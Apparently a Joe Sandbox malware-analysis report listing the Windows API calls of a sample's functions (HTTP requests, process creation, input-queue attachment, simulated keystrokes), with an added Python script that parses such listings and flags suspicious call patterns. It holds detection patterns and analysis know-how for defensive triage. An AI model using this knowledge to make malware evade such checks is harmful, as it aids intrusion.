                                          • Opcode Fuzzy Hash: cc7b53bdcaf17d3b60d9c1370d0476d608c6ddd3d3ac68dcbd5ccde5d982ddf7
                                          • Instruction Fuzzy Hash: C2A17E30701216CFDB29EF14C5A5F69F368BF45700F5542ADE80AAB6A2DB30AD56CF90
                                          APIs
                                          • EnumChildWindows.USER32(?,0095A439), ref: 0095A377
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: a1a1e5efbb5bef740fe033ae57948d05c5d657099506875de6a53cf4652eab92
                                          • Instruction ID: 960e0ab2dc3af6909063f8561d4c919313d80662d0f2ba09dda0f386135936a9
                                          • Opcode Fuzzy Hash: a1a1e5efbb5bef740fe033ae57948d05c5d657099506875de6a53cf4652eab92
                                          • Instruction Fuzzy Hash: 0091D530A04605AECB08DFA1D492BEDFBB8BF84315F508319EC59A7181DB31699DCB95
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 00902EAE
                                            • Part of subcall function 00901DB3: GetClientRect.USER32(?,?), ref: 00901DDC
                                            • Part of subcall function 00901DB3: GetWindowRect.USER32(?,?), ref: 00901E1D
                                            • Part of subcall function 00901DB3: ScreenToClient.USER32(?,?), ref: 00901E45
                                          • GetDC.USER32 ref: 0093CD32
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0093CD45
                                          • SelectObject.GDI32(00000000,00000000), ref: 0093CD53
                                          • SelectObject.GDI32(00000000,00000000), ref: 0093CD68
                                          • ReleaseDC.USER32(?,00000000), ref: 0093CD70
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0093CDFB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: f51b7d96ea9c9d9a69e8b497ccbaff694aed991040db100ab4b280c65e146c50
                                          • Instruction ID: b96e58e0a55dd89cfb8bd56a085532c7779e60cfc4d28b60e38e7272f8cb215a
                                          • Opcode Fuzzy Hash: f51b7d96ea9c9d9a69e8b497ccbaff694aed991040db100ab4b280c65e146c50
                                          • Instruction Fuzzy Hash: 1F71E471504605DFCF218F64C888AAA7BB9FF48320F14467AFD65AA2E6D7319C81DF60
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00971A50
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00971A7C
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00971ABE
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00971AD3
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971AE0
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00971B10
                                          • InternetCloseHandle.WININET(00000000), ref: 00971B57
                                            • Part of subcall function 00972483: GetLastError.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 00972498
                                            • Part of subcall function 00972483: SetEvent.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 009724AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 2603140658-3916222277
                                          • Opcode ID: 226858b8b383fcca8995f78f88005903f964549aa33862e7ddab6a6f89f4129c
                                          • Instruction ID: 46d335295456992083f16b47a34df15ad6f4586c9da84c81ede89f3f1dc04e42
                                          • Opcode Fuzzy Hash: 226858b8b383fcca8995f78f88005903f964549aa33862e7ddab6a6f89f4129c
                                          • Instruction Fuzzy Hash: C74190B2511218BFEB118F54CC89FBB7BACEF48350F008126F9099A245E7749E409BA4
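The per-function API listings above (the GetForegroundWindow/AttachThreadInput function at 009611F0 and the WinINet request function at 00971A50 in particular) are the raw material for triage, but reading them by hand across hundreds of functions does not scale. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses blocks in exactly this text format into call records and tags the call sequences an analyst looks for first. The behaviour tag names are our own; INTERNET_OPTION_SECURITY_FLAGS (31, the 0000001F passed to InternetSetOptionW above) is the Windows SDK value. The sample listing embedded in the block is constructed to mirror three of the functions on this page.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' listings and tag call sequences worth a look.

Added example, not part of the Joe Sandbox report or its plugin; the tag names are ours.
"""
import re
from typing import Dict, List, NamedTuple, Optional


class ApiCall(NamedTuple):
    name: str               # e.g. "HttpSendRequestW"
    module: str             # e.g. "WININET"
    args: list              # int for hex args, None where the plugin printed "?", else raw text
    ref: int                # call-site address
    subcall: Optional[int]  # callee address on "Part of subcall function" lines, else None


class FunctionBlock(NamedTuple):
    calls: List[ApiCall]
    strings: List[str]      # "$"-separated "String ID" values, if the block lists any


# Line shapes the listing uses (with or without an argument list, optionally as a subcall):
#   • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971AE0
#   • GetDlgCtrlID.USER32 ref: 0095901F
#     • Part of subcall function 00972483: GetLastError.KERNEL32(?,?), ref: 00972498
_CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_STRING_ID_RE = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")
INTERNET_OPTION_SECURITY_FLAGS = 31  # Windows SDK value; 0x1F in the InternetSetOptionW call above


def _decode_arg(raw: str):
    raw = raw.strip()
    if raw == "?":
        return None
    try:
        return int(raw, 16)
    except ValueError:
        return raw  # a literal such as "close all" in the mciSendStringW call


def parse_listing(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per 'APIs' header; every other report line is skipped."""
    blocks: List[FunctionBlock] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append(FunctionBlock([], []))
            continue
        if not blocks:
            continue
        m = _CALL_RE.match(line)
        if m:
            args = [_decode_arg(a) for a in m["args"].split(",")] if m["args"] else []
            blocks[-1].calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                            int(m["sub"], 16) if m["sub"] else None))
            continue
        m = _STRING_ID_RE.match(line)
        if m and m["ids"].strip():
            blocks[-1].strings.extend(m["ids"].strip().split("$"))
    return blocks


def classify(block: FunctionBlock) -> List[str]:
    """Coarse behaviour tags from the API set plus the constants the plugin recovered."""
    names = {c.name for c in block.calls}
    tags: List[str] = []
    if {"GetForegroundWindow", "AttachThreadInput"} <= names:
        tags.append("attach-to-foreground-input")        # input-queue sharing / focus forcing
    if {"HttpOpenRequestW", "HttpSendRequestW"} <= names:
        tags.append("wininet-http-request")
        if any(c.name == "InternetSetOptionW" and len(c.args) > 1   # tolerate "?" args
               and c.args[1] == INTERNET_OPTION_SECURITY_FLAGS for c in block.calls):
            tags.append("wininet-security-flags-changed")  # TLS validation policy touched
    if "CreateProcessW" in names:
        tags.append("process-creation")
    if "EnumChildWindows" in names and "CLASSNN" in block.strings:
        tags.append("control-lookup-by-classnn")
    return tags


def triage(text: str) -> Dict[int, List[str]]:
    """{address of the block's first direct call: tags} for every block that earns a tag."""
    result: Dict[int, List[str]] = {}
    for block in parse_listing(text):
        direct = [c for c in block.calls if c.subcall is None]
        tags = classify(block)
        if direct and tags:
            result[direct[0].ref] = tags
    return result


# Constructed sample mirroring three of the function blocks in the listing above.
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00971A50
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00971A7C
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00971AD3
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00971AE0
  • Part of subcall function 00972483: GetLastError.KERNEL32(?,?,00971817,00000000,00000000,00000001), ref: 00972498
APIs
• GetCurrentThreadId.KERNEL32 ref: 009611F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00960268,?,00000001), ref: 00961204
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00960268,?,00000001), ref: 0096121A
APIs
• EnumChildWindows.USER32(?,0095A439), ref: 0095A377
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
"""
```

Run `triage()` over the whole report text; it keys each tagged function by its first call-site address so the hits can be cross-referenced with the Memory Dump Source offsets. Arguments the plugin could not recover are printed as `?` and decode to `None`, so any rule that depends on a constant (like the security-flags check) has to tolerate missing values rather than index blindly.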
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0098F910), ref: 00978D28
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0098F910), ref: 00978D5C
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00978ED6
                                          • SysFreeString.OLEAUT32(?), ref: 00978F00
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: 77e46bf0d52db4914506e2bb4fe2924a7b3d7405fb93bf3390d876bce6c9c200
                                          • Instruction ID: 96e8555479469db378e02533a55194ebf5bb2b7938e30e64eda8aa9a091e3103
                                          • Opcode Fuzzy Hash: 77e46bf0d52db4914506e2bb4fe2924a7b3d7405fb93bf3390d876bce6c9c200
                                          • Instruction Fuzzy Hash: 46F11C72A00109EFDF14DF94C888EAEB7B9FF85315F148458F909AB251DB31AE45CB51
                                          APIs
                                          • _memset.LIBCMT ref: 0097F6B5
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0097F848
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0097F86C
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0097F8AC
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0097F8CE
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0097FA4A
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0097FA7C
                                          • CloseHandle.KERNEL32(?), ref: 0097FAAB
                                          • CloseHandle.KERNEL32(?), ref: 0097FB22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                           • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: e086775b91a8023a814d003b5513528ff23df9402a0ce98b91aacd5f31bc834d
                                          • Instruction ID: 355ae0160ed177b2abd176f8f220e1e2779cc9f49a5ed4ad295fe89e9d9fe34b
                                          • Opcode Fuzzy Hash: e086775b91a8023a814d003b5513528ff23df9402a0ce98b91aacd5f31bc834d
                                          • Instruction Fuzzy Hash: 3CE1A1726043009FC714EF24C8A1B6ABBE5AF85354F14C96DF899AB2A2DB30DC45CB52
                                          APIs
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00963697,?), ref: 0096468B
                                            • Part of subcall function 0096466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00963697,?), ref: 009646A4
                                            • Part of subcall function 00964A31: GetFileAttributesW.KERNEL32(?,0096370B), ref: 00964A32
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00964D40
                                          • _wcscmp.LIBCMT ref: 00964D5A
                                          • MoveFileW.KERNEL32(?,?), ref: 00964D75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: cd88d4305d6cd96823d2abe4de5fab6273fdb0eaa2150bcbbf344e11af8ab31c
                                          • Instruction ID: 70940b006539ccca0216815958a32f5b6691f43719c121148ae2d9599c765381
                                          • Opcode Fuzzy Hash: cd88d4305d6cd96823d2abe4de5fab6273fdb0eaa2150bcbbf344e11af8ab31c
                                          • Instruction Fuzzy Hash: 1E5156B24083459FC725EBA0D891ADFB3ECAFC5350F40092EB289D3191EF35A588C766
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 009886FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: a1d0a7ea57e754d3710235634281e444bc678866102b60242aeb80e3436cf82a
                                          • Instruction ID: 1438bcf9fc08a965674c1008df29a52a3f6ece358e12c4bf3627c0b9a5cf55b0
                                          • Opcode Fuzzy Hash: a1d0a7ea57e754d3710235634281e444bc678866102b60242aeb80e3436cf82a
                                          • Instruction Fuzzy Hash: 6F51B570514244BFEF24AB28CC89FAE7BA8EB05720FA04515F921D63E1DF75A980DB60
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0093C2F7
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0093C319
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0093C331
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0093C34F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0093C370
                                          • DestroyIcon.USER32(00000000), ref: 0093C37F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0093C39C
                                          • DestroyIcon.USER32(?), ref: 0093C3AB
                                            • Part of subcall function 0098A4AF: DeleteObject.GDI32(00000000), ref: 0098A4E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: b7eb7b9ed8c52e056e3629377ce5629ea3986510aa48c8e6f1b931749266852c
                                          • Instruction ID: 01c4494643719457cc71c51a138d8d54404a00b433110dfd82200f9da762d1d4
                                          • Opcode Fuzzy Hash: b7eb7b9ed8c52e056e3629377ce5629ea3986510aa48c8e6f1b931749266852c
                                          • Instruction Fuzzy Hash: A6515870A10609AFDB24DF64CC49FAA7BB9EB58310F104529F952E72E0DB70ED90EB50
                                          APIs
                                            • Part of subcall function 0095A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0095A84C
                                            • Part of subcall function 0095A82C: GetCurrentThreadId.KERNEL32 ref: 0095A853
                                            • Part of subcall function 0095A82C: AttachThreadInput.USER32(00000000,?,00959683,?,00000001), ref: 0095A85A
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0095968E
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009596AB
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 009596AE
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 009596B7
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009596D5
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009596D8
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 009596E1
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009596F8
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 009596FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: af3cf197922ffbc31a82764c8ce028b776a739cb50d59fddfa59ad41ed3c1f31
                                          • Instruction ID: 5cd984448c11c7b717759d57d0b04486c10e538afc772971087220d4d9f0d119
                                          • Opcode Fuzzy Hash: af3cf197922ffbc31a82764c8ce028b776a739cb50d59fddfa59ad41ed3c1f31
                                          • Instruction Fuzzy Hash: 0D11E1B1A24218BEF7106F61DC89F6A3B2DEB4C751F101525F744AB1A0C9F25C10EBA8
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0095853C,00000B00,?,?), ref: 0095892A
                                          • HeapAlloc.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 00958931
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0095853C,00000B00,?,?), ref: 00958946
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0095853C,00000B00,?,?), ref: 0095894E
                                          • DuplicateHandle.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 00958951
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0095853C,00000B00,?,?), ref: 00958961
                                          • GetCurrentProcess.KERNEL32(0095853C,00000000,?,0095853C,00000B00,?,?), ref: 00958969
                                          • DuplicateHandle.KERNEL32(00000000,?,0095853C,00000B00,?,?), ref: 0095896C
                                          • CreateThread.KERNEL32(00000000,00000000,00958992,00000000,00000000,00000000), ref: 00958986
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 1fe3dfa25eeeda222c29edd8dae6383b94da3513cb0a3af88315f8be2988758b
                                          • Instruction ID: c5a2232f90889d482c3079d9f183ccafeae67d4a74bf2f7004eaa5a05b13706d
                                          • Opcode Fuzzy Hash: 1fe3dfa25eeeda222c29edd8dae6383b94da3513cb0a3af88315f8be2988758b
                                          • Instruction Fuzzy Hash: 5601BF75254304FFE710ABA5DC9DF677B6CEB89711F405421FA05DB291CA749810DB20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: a66936be8bba83c70c912a7d8216ba83a5049c95aee7e0c55cf4e8348ab9b8ef
                                          • Instruction ID: 89ee17a1dcdd412d08027e73acee620e416f25111cd25001fc95b3eb949f9626
                                          • Opcode Fuzzy Hash: a66936be8bba83c70c912a7d8216ba83a5049c95aee7e0c55cf4e8348ab9b8ef
                                          • Instruction Fuzzy Hash: 7FC19472A002199FDF10DFA8D885BAEB7F9FF88314F148469F949A7290E7709D45CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.00000000009B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459877987.00000000009BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459890264.00000000009C7000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_900000_Gz2FxKx2cM.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$_memset
                                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                          • API String ID: 2862541840-625585964
                                          • Opcode ID: 9db40939caec6c1861caab18879f8da05f4f23b73df0d7f012074358152ae1a6
                                          • Instruction ID: 61d908a32902fa34078be493f1e861d042414c8fe4bdac932e732dd5a5e25136
                                          • Opcode Fuzzy Hash: 9db40939caec6c1861caab18879f8da05f4f23b73df0d7f012074358152ae1a6
                                          • Instruction Fuzzy Hash: AB91AF72A00219ABDF24DFA5C848FAFB7B8EF85714F10C559F519AB291D7709901CFA0
                                          APIs
                                            • Part of subcall function 0095710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?,?,00957455), ref: 00957127
                                            • Part of subcall function 0095710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957142
                                            • Part of subcall function 0095710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?,?), ref: 00957150
                                            • Part of subcall function 0095710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00957044,80070057,?), ref: 00957160
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00979806
                                          • _memset.LIBCMT ref: 00979813
                                          • _memset.LIBCMT ref: 00979956
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00979982
                                          • CoTaskMemFree.OLE32(?), ref: 0097998D
                                          Strings
                                          • NULL Pointer assignment, xrefs: 009799DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1459806294.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                          • Associated: 00000000.00000002.1459795013.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1459846117.000000000098F000.00000002.00000001.01000000.00000003.sdmp
